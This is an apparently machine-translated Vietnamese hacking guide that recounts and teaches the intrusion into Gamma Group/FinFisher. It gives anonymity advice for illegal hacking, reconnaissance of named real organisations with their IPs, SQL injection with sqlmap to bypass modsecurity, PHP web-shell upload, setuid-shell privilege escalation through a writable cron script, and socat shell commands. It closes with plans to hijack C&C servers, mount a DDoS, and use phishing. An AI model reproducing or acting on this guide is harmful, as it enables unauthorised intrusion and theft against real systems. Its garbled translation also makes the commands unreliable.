1 giới thiệu
Tôi không viết bài này để khoe khoang về những gì mà tôi có được 31.337 h4x0r
và những gì m4d sk1llz nó đã làm chủ gamma. Tôi viết bài này để làm sang tỏ thế
nào là hacking, để cho thấy nó đơn giản như thế nào để truyền thông tin và gây
hứng thú cho bạn khi đi ra ngoài và hack một cái gì đấy. Nếu bạn không có kinh
nghiệm với lập trình hoặc là hacking , một số văn bản dưới đây trông giống như là
những ngôn ngữ ngoại quốc. Kiểm tra phần tài nguyên ở cuối để giúp bạn bắt đầu.
Và tin tưởng tôi, một khi bạn đã học được những điều cơ bản bạn sẽ nhận ra nó
thật sự dễ dàng hơn điền vào một đơn FOIA.
2 Giữ an toàn
Điều này là bất hợp pháp, vì thế bạn sẽ cần có những biện pháp phòng ngừa căn
bản:
- Thực hiện một khối lượng mã hóa ẩn với Truecrypt 7.1 a
- Bên trong khối lượng mã hóa cài đặt Whonix
- Cho tất cả mọi thứ qua tor là đủ rồi nó tốt hơn là sử dụng kết nối internet với
tên hoặc địa chỉ của bạn. Một cantenna, aircrack, và reaver có thể có ích ở
đây
Miễn là bạn bình thường như không bao giờ làm bất cứ việc gì lien quan đến
hack ngoài whonix, không bao giờ làm bất cứ việc gì liên quan đến máy tính
bình thường của bạn bên trong whonix, không bao giờ đề cập đến bất kỳ thông
tin nào về cuộc sống bên ngoài của bạn khi mà nói chuyện với bất kỳ hacker
nào khác, và không bao giờ khoe khoang về những thao tác bất hợp pháp của
bạn với bạn của bạn ngoài cuộc sống thực, và sau đó thật tuyệt vời là bạn có thể
làm bất kỳ điều gì mà bạn muốn mà không sợ bị phát hiện.
Chú ý: tôi không khuyên hack trực tiếp trên tor. Trong khi tor có thể sử dụng
một số thứ như với trình duyệt web, khi nghĩ đến việc sử dụng một số công cụ
hack như nmap, sqlmap, and nikto lấy hang ngàn yêu cầu, chúng sẽ chạy rất
chậm hơn khi qua tor. Chưa kể đến việc bạn sẽ nhận được một địa chỉ ip public
để kết nối trở lại shell. Tôi khuyên bạn nên sử dụng máy chủ bạn đã hack hoặc
một VPS thanh toán với bitcoin để hack chúng. Bằng cách đó việc bang thông
bị chậm giữa bạn với máy chủ qua tor sẽ được khắc phục. Tất cả những câu

lệnh mà bạn chạy sẽ nhanh chóng được kết nối với mục tiêu của bạn.
3 Lập ra các bản đồ mục tiêu
Thông thường tôi chỉ cần sử dụng liên tục fierce , whois lookups trên các địa
chỉ ip và tên miền, và reverse whois lookups để tìm tất cả các không gian địa
chỉ ip và tên miền gắn liền với một tổ chức.
/>cho một ví dụ, chúng ta hãy thực hiện với Blackwater. Chúng ta bắt đầu biết
trang chủ của họ là academi.com chạy file fierce.pl-dns academi.com chúng ta
sẽ biết được các tên miền phụ của họ là:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com
Bây giờ chúng ta dùng whois lookups và tìm ra những trang chủ của
academi.com được lưu trữ trên amazon websize service, trong đó những ÍP
khác ở trong phạm vi:
NetRange: 67.238.84.224 - 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd
Sử dụng whois lookups trên academi.com , cũng thấy nó đăng kí với cùng một
địa chỉ giống thế, vì vậy chúng ta sẽ sử dụng một chuỗi để tìm kiếm với reverse
whois lookups. Theo như tôi được biết thì tất cả các reverce whois lookups đều
có giá tiền, vì vậy tôi chỉ thấy rẻ với google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup
"850 Puddin Ridge Rd" inurl:domaintools
Bây giờ chạy file fierce.pl-range trên dãy ip bạn tìm thấy để tra cứu tên miền và
fierce.pl-dns trên các tên miền để tìm miền phụ và các địa chỉ ip. Làm niều lần
hơn, và lặp lại quá trình này cho đến khi chúng ta tìm dược mọi thứ.

Ngoài ra chỉ cần google tổ chức và duyệt xung quanh các trang web của nó, vó
dụ như trên academi.com chúng ta tìm thấy mọt cổng thông tin nghề nghiệp,
một cửa hang trực tuyến và mọt tài nguyên về một nhân vì vậy bây giờ chúng ta
sẽ có một số chi tiết:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com
Nếu bạn lặp lại nhiều lần với whoislookups và như vậy bạn sẽ tìm thấy dường
như academiproshop.com dường như khong được tỏ chức oặc duy trì bởi
blackwater, nên ngẫu nhiên được loại bỏ ra khỏi danh sách của IPs/ domain.
Trong trường hợp của FinFisher cái mà đã dẫn tối đến tổn thương
finsupport.finfisher.com chỉ đơn giản như dùng whois lookups của Fisher.com
cái mà tìm ra nó đã đăng kí tên miền
"FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
Tìm thấy gamma-international.de, cái mà hướng đến để tìm thấy
finsupport.finfisher.com
…do đó bây gườ bạn đã có một số ý tưởng về việc tôi đã vạch ra mục tiêu như
thế nào.
Điều này thực sự là một trong những phần quan trọng nhất, đó là một cuộc tấn
công lớn hơn bề mặt mà bạn có thể vạch ra, sẽ dẽ dàng tìm được một lỗ hổng ở
đâu đó trong nó.
4. quét và khai thác
Quét tất cả các dãy ip mà bạn đã tìm thấy với nmap để tìm kiếm tất cả các dịch
vụ đang chạy. Bên cạnh đó, từ những cổng quét chuẩn, quét với SNMP bị đánh
giá thấp.
Bây giờ với mỗi dịch vụ mà bạn tìm thấy chạy:
- Nó có để lộ ra một cái gì đó không nên? Đôi khi các công ty sẽ chạy các

dịch vụ mà không yêu cầu xác thực mà cho rằng nó là ăn toàn vì url hoặc ip
để truy cập nó không phải là công cộng. Có thể fierce sẽ tìm thấy một git tên
miền phụ và bạn có thể tới git.companyname.com/gitweb/và duyệt mã
nguồn của họ.
- Đó có phải là một sai lầm khủng khiếp? có thể họ có máy chủ ftp cho phép
những vô danh truy cập để đọc hoặc viết về một thư viện quan trọng. có thể
họ có một cơ sở dữ liệu mà không cần mật khẩu (lol stratfor). Có thể họ đx
nhúng mọt dịch vị như( voip boxer, ip cameras, routers,vv) đang sử dụng
của nhà sản xuất với những mật khẩu mặc định.
- Nó có chạy một phiên bản phần mềm cũ dễ bị tổn thương khi khai thác?
Webserver xứng đáng với các thể loại mà họ làm chủ. Cho bất kỳ một trang web
nào, bao gồm cả nmap thường tìm thấy đang chạy trên cổng không chuẩn, tôi
thường làm các việc sau:
• Duyệt chúng. Đặc biệt là trên các tên miền phụ mà fierce đã tìm ra cái mà
không có chủ định để cho công chúng xem như test.company.com howcj là
dev.company.com, bạn sẽ thường xuyên thấy được những thứ thú vị khác
bằng cách tìm kiếm chúng.
• Chạy nikto. Cái mà sẽ kiểm tra mọi thứ giống như là
webserver/.svn/,webserver/backup,webserver/phpinfor.php và vài nghìn lỗi
phổ biến khắc và lỗi cấu hình sai.
• Xác định được các phần mềm đang được sử dụng trên trang web. Whatweb í
useful.
• Tùy thuộc và phần mềm mà trag web đó đang chạy là gì có thể sử dụng
nhiều công cụ cụ thể khác như là wpscan, cms-explorer, và joomscan.
Trước tiên hãy cố gắng thử tất cả các dịch vụ để xem có lỗi cấu hình sai không,
hoặc là lỗ hổng công cộng, hoặc là các cách dễ dàng khác. Nếu không có, hãy
chuyển thời gian đó vào việc tìm kiếm một lỗ hổng mới.
• Các khách hàng đã được mã hóa cho các ứng dụng web nhiều hơn cho các
lỗi lớn hơn để sử dụng và các dự án lớn, do đó hãy cố gắng với những người
đầu tiên. Tôi sử dụng ZAP và một vài sự kết hợp tự động của nó cùng với sự

giúp đỡ vòng quanh để chặn proxy.
• Đối với những phần mềm tùy chỉnh họ đang chạy, hãy lấy một bản sao về dể
nghiên cứu. nếu nó là phần mềm free bạn có thể tải nó về. Nếu đó là độc
quyền bạn có thể ăn cướp nó. Nếu nó là độc quyền và đủ bí mật bạn không
thể ăn cướp nó, bạn có thể mua nó hoặc tìm các trang web đang chạy các
phần mềm giống như thế bằng cách sử dụng google, tìm một trong những
cách dễ dàng để hack và nhận một bản sao từ chúng.
[0]
[1]
[2]
[3]
[4]
[5] />Đối với findsupport.finfisher.com quá trình này có:
- Bắt đầu chạy ở chế độ nền.
- Truy cập vào trang web. Xem những thứ không cần đăng nhập, và nhanh
chóng kiểm tra sqli trong mẫu đăng nhập.
- Xem với ifwhatweb để biết bất cứ điều gì mà phần mềm của trang web đang
chạy.
- Whatweb không thể nhận ra nó vì thế câu hỏi tiếp theo mà tôi muốn được trả
lời đó là nó là một trang web thường lệ bởi gramma hay nó là một trang web
khác sử dụng những phần mềm giống như thế?
- Tôi đã xem mã nguồn một trang web để tìm url và tôi có thể tìm kiếm trên
index.php nó không phải là chính xác duy nhất cho phần mềm này, tôi chọn
scripts/scripts.js.php và google: scripts/scripts.js.php
- Tôi cũng thấy có một số ít các trang web nhỏ khác sử dụng phần mềm này
tất cả đều được mã hóa bởi một công ty webdesign nhỏ. Có vẻ như mỗi
trang web thường lệ đều được mã hóa nhưng họ chia sẻ rất nhiều mã. Vì vậy
tôi hack vài cái trong số đó để có được bọ sưu tập mã đầy đủ được viết bởi
các công ty webdesign.
Tại thời điểm này tôi có thể thấy các câu chuyện mới rằng các nhà báo sẽ viết

nên quan điểm: “ trong một cuộc tấn công nhiều bước và quan trọng, các tin tặc
đầu tiên thỏa hiệp với các côn ty thiết kế websign để có được giữ liệu bí mật để
có thể hõ trợ họ trong cuộc tấn công vào gammagroup…”
- google allinurl:"Scripts/scripts.js.php" và tìm ra một số trang web khác.
- Chú ý là tất cả bọn họ đang phòn chống sql trong tham số url đầu tiên mà toi
đã thử.
- Khi nhận ra họ đang chạy apache modsecurity tôi cần sử dụng sqlmap0 với
các tùy chọn sau: tamper = 'giả mạo / modsecurityversioned.py'
- Có được các thông tin về admin để đăng nhập, đăng nhập và tải lên một php
shell ( các phần kiểm tra cho phép file mở rộng được thực hiện tại phía
khách hàng trong javacript), và tải về mã nguồn của trang web.
- Nhìn qua các mã nguồn họ có thể đặt tên cho nó như những lõ hổng chết tiệt
web app v2. Nó có sqli, lfi, file kiểm tra tải lên được thực hiện từ phía khách
hàng nhờ javascript, và neus bạn không được xác thực các quản trị mạn sẽ
gửi bạn quay trở lại trang đăng nhập với một tiêu đề vị trí. Nhưng nếu bạn
có thể lại bỏ các ủy quyền ngăn chặn truy nhập của bạn thì bạn có thể truy
nhập chúng.
quay trở lại trên các trang web findsupport, theadmin/backoffice/page return 403
forbidden, và tôi đang gặp một số vấn đề với lfi, vì vậy tôi chuyển sang sử dụng
các sqli ( nó thật sự tốt vì có tới hàng chục tùy chọn có thể được chọn từ nó)
các trang web khác bởi nhà thiết kế web đều có một print.php dự phòng, do đó một
số yêu cầu nhanh chóng tới:
and 1=1
and 2=1
tiết lộ rằng ffindsupport cũng là một print.php và nó cũng là một dự phòng. Và nó
là một cơ sở quản trị, đối với my sql nó ngĩa là bạn có thể dọc hoặc viết các file.
Hóa ra với các trang web đã được kích hoạt magicquotes, nên tôi không thể sử
dụng into outfile để viết các file. Nhưng tôi có thể sử dụng môt đoạn script để sử
dụng sqlmap—file—read để nhận mã nguồn php cho một url, và một trang web
thong thường để nhận html, và tìm thấy tập tin bao gồm hoặc được yêu cầu tron

nguồn php, và tìm thấy các tập tin php liên kết tới html, để đồng nhất tải về mã
nguồn cho toàn bộ trang web.
Hìn qua các nguồn tôi có thể thấy rằng các khách hàng có thể đính kèm một tập tin
để có thể hỗ trợ họ vào cửa, và không có phần kiểm tra trên phần mở rộng tập tin,
do đó tôi đặt tên người dùng và mật khẩu ra khỏi cơ sở dữ liệu khách hàng, tạo ra
một yêu cầu hỗ trợ mới với php shell được đính kèm đó và tôi đang ở trong.
5 thất bại tại bước leo thang
Root qua 50% của linux bạn sẽ bắt gặp 2 kịch bản:
Linux_Exploit_Suggester [0],
and unix-privesc-check [1].
1. [0]
2. [1]
Hãy tìm những hỗ trợ đang được chạy phiên bản mới nhất của debian với khôn có
khai thác root local, nhưng với unix-privesc-check trả lại: chú ý:
/etc/cron.hourly/mgmtlicensestatus đang được điều hành bởi crongiosng như là
root. Người sử dụng www-dữ liệu có thể viết thư cho
/etc/cron.hourly/mgmtlicensestatus
Chú ý: /etc/cron.hourly/webalizer được chạy bởi cron giống như là chủ. Người sử
dụng www-data có thể viết tới /etc/cron.hourly/webalizer
vì vậy tôi thêm vào /etc/cron.hourly/webalizer:
gốc chown: root / path / to / my_setuid_shell
chmod 04.755 / path / to / my_setuid_shell
chờ đợi 1 giờ và …không thấy gì, đình công lại trong khi quá trình cron vẫn đang
chạy nó dường như khôn thực sự chạy công việc của cron, tìm kiếm một trang
wealizer và thấy nó không update cả tháng trước, rõ rang sau khi cập nhật định kỳ
múi giờ đôi khi nó sẽ chạy ở thời điểm sai hoặc đôi khi không chạy và tất cả những
gì bạn phải làm là khởi động lại cron sau khi thay đổi múi giờ, ls -l
/etc/localtime hiển thị múi giờ đã được cập nhật từ ngày 6/6 và các webalizer đã
nguuwngf việc ghi những số liệu thống kê, và đó có thể là vấn đề. Ở mức nào đó,
điều này không là gì đối với máy chủ lưu trữ nên tôi nhận ra rằng có thể truy cập

được tất cả mọi thứ thú vị trên đó. Root sẽ không nhận được quá nhiều thứ nên tôi
đã di chuyển vào phần còn lại của mạng.
6. xoay vòng
Bước tiếp theo là nhìn xung quanh xem mạng nội bộ của nơi mà bạn đã tấn công.
Điều này rất thú vị giống như là lần đầu tiên bạn quét và khai thác, ngoại trừ sau
tường lửa bạn có thể có nhiều dịch vụ thú vị hơn sẽ được tiếp xúc, một tarball đang
chứa một bản sao các liên kết của nmap và nó chứa tất cả các kịch bản mà bạn có
thể tải lên và chạy trên bất kỳ nơi lưu trữ nào rất có ích cho việc này. Các nfc khác
nhau đặc biệt là các smb-*script nmap sẽ rất có ích cho việc này.
Diều thú vị duy nhát tôi có thể nhận được trên mạng nội bộ finsupport là một
webserver khác đang thực thi một thư mục có tên là qateam có chứa mã độc cho di
động của họ.
7. have fun
Khi bạn đang ở tron mạng lưới của họ, niềm vui thật sự bắt đàu. Chỉ cần sử dụng
trí tưởng tượng của bạn. trong khi tôi đạt được vị trí này để hướng dẫn cho người
khác, không có lí do gì để giới hạn mình rò rỉ sự hiểu biết. kế hoạch ban đầu của
tôi là:
- Hack gamma và có được một bản sao phần mềm máy chủ của finspy.
- Tìm ra những lỗ hổng trong finspy server
- Quét trên internet với tor và hack tất cả các finspy c&C server
- Xác định các nhóm đang chạy chúng
- Sử dụng C&C server tải lên và chạy một chương trình trên tất cả các mục
tiêu nói với họ người mà đã làm gián điệp cho chúng.
- Sử dụng C&C để gỡ bỏ các finfisher trên tất cả các mục tiêu
- Tham gia vào cựu C&C server để botnet tới DDoS Gamma Group
Đó chỉ là sau khi tôi đã thất bại trong việc hack đầy đủ gamma và kết thúc với
một vài tài liệu thú vị nhưng không có bản sao của phần mềm máy chủ finspy
mà tôi đã thực hieenjdo có ké hoạch sao lưu lulzy ít rò rỉ công cụ của họ, trog
khi chế giễu họ trên twitter.
Chỉ điểm cho GPU của bạn tại FinSpy-PC+Mobile-2012-07-12-Final.zip và bẻ

khóa mật khẩu là tôi có thể chuyển sang bước 2.
8. phương pháp khác.
Phương pháp trên mà tôi dx nêu ra là quét, tìm ra các lỗ hổng và khai thác, đó chỉ
là một cách để hack, có lẽ nó chỉ phù hợp hơn với những người đã có nền tảng sẵn
trong lập trình. Không có một phương pháp nào đúng đắn và tốt hơn khác. Các
cách chin khác mà tôi sẽ nêu mà không đi vào chi tiết đó là:
- Khai thác trong cá trình duyệt web, java, flash, hoặc microssoft offline, ke
showpj với việc gửi email cho nhân viên với môt thông điệp có sức thuyêt
phục hơn để nhận chũng từ việc mở một liên kết hoặc một tập tin đính kèm.
Hoặc hack một trang web thường xuyên của các nhân viên và thêm vào đó
các webserver, java, flash và kai thác nó. Đây là cách được sử dụng bởi hầu
hết các nhóm làm việc cho chính phủ, nhưng bạn không cần phải có chính
phủ với hàn triệu để chi tiêu cho các nghiên cứu 0day hoặc đăng kí để
finsploit hoặc vupen để kéo nó đi. Bạn có thể nhận được một kit chất lượng
nga khai thác bộ cho một vài ngàn, và cái giá thuê để truy cập còn ít hơn
nhiều. ngoài ra còn có metasploit browser autopwn, nhưng có thể bạn sẽ
may mắn hơn với không có sự khai thác và làm giả flash để cập nhật nhanh
chóng.
- Lợi dụng những thực tế mà mọi nười tin tưởng rằng tốt đẹp, tin cậy, và hữu
ích dến 95% của thời gian. ngành công nghiệp inforsec đã phát minh ra một
thuật ngữ một số loại khoa học: "Kỹ thuật Xã hội". Đây có lẽ là con đường
để đi nếu bạn không biết
quá nhiều về máy tính, và nó thực sự là tất cả những gì cần phải là một thành
công
Hacker [0].
[0]
- [9] - Tài nguyên
Liên kết:
*
*

*
*
*
*
* Http://pen-testing.sans.org/ /04/26/got-Meterpreter-pivot
* Http://www.offensive-security.com/ /PSExec_Pass_The_Hash
* Https://securusglobal.com/ /dumping-windows-credentials/
* Https://www.netspi.com/blog/entryid/140/resources-cho-vọng thấm-xét
nghiệm
(tất cả các bài đăng trên blog khác của ông là quá lớn)
* Https://www.corelan.be/ (bắt đầu khai thác văn bản hướng dẫn phần 1)
* Http://websec.wordpress.com/ /exploiting-php-file-đưa /
Một mẹo nó lá ra là trên hầu hết các hệ thống bản ghi truy cập apache là
có thể đọc được chỉ bởi root, nhưng bạn vẫn có thể bao gồm từ / proc / self /
fd / 10
bất cứ điều gì fd apache mở nó như là. Nó cũng sẽ hữu ích hơn nếu nó được
đề cập
những gì phiên bản của php các thủ đoạn khác nhau đã được cố định.
* Http://www.dest-unreach.org/socat/
Lấy vỏ ngược lại có thể sử dụng một bản sao liên kết tĩnh của socat để thả
trên
mục tiêu của bạn và:
mục tiêu $ socat exec: 'bash -li, pty, stderr, setsid, SIGINT, lành mạnh tcp-
nghe: portnum
tổ chức $ socat file: `tty`, nguyên liệu, tiếng vang = 0 tcp kết nối: localhost:
portnum
Nó cũng hữu ích cho việc thiết lập trụ kỳ lạ và tất cả các loại công cụ khác.
sách:
* Sổ tay Các ứng dụng Web của Hacker
* Hacking: The Art of khai thác

* Cơ sở dữ liệu Sổ tay Hacker của
* Nghệ thuật Đánh giá phần mềm bảo mật
* A Bug Diary Hunter
* Ngầm: Tales of Hacking, điên rồ, và Obsession trên Electronic Frontier
* TCP / IP Illustrated
Ngoài các công cụ hack cụ thể hầu như bất cứ điều gì hữu ích cho hệ thống
quản trị để thiết lập và điều hành mạng cũng sẽ hữu ích cho
khám phá chúng. Điều này bao gồm sự quen thuộc với các cửa sổ nhắc lệnh
và Unix vỏ, kỹ năng kịch bản cơ bản, kiến thức về LDAP, Kerberos, hoạt
động thư mục, mạng, vv
- [10] - Outro
Bạn sẽ nhận thấy một số âm thanh này chính xác như những gì Gamma đang
làm. Hacking là một công cụ. Nó không bán các công cụ hack mà làm cho
Gamma ác. Đó là người của họ khách hàng đang nhắm mục tiêu và với mục
đích gì mà làm cho họ xấu xa. Đó không phải là để nói rằng công cụ này là
vốn trung lập. Hacking là một công cụ tấn công. trong cùng một cách mà
chiến tranh du kích làm cho nó khó khăn hơn để chiếm một quốc gia, bất cứ
khi nào nó rẻ hơn để tấn công hơn để bảo vệ nó khó hơn để duy trì bất hợp
pháp quyền hạn và bất bình đẳng. Vì vậy, tôi đã viết này để cố gắng làm cho
hacker dễ dàng hơn và nhiều hơn nữa truy cập. Và tôi muốn chỉ ra rằng Tập
đoàn Gamma hack thực sự là không có gì ưa thích, sqli chỉ tiêu chuẩn, và
rằng bạn không có khả năng đi ra ngoài và mất hành động tương tự.
Đoàn kết để tất cả mọi người ở Gaza, Israel-lương tâm chống đối, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, và bỏ tù tất cả khác
hacker, bất đồng chính kiến, và tội phạm!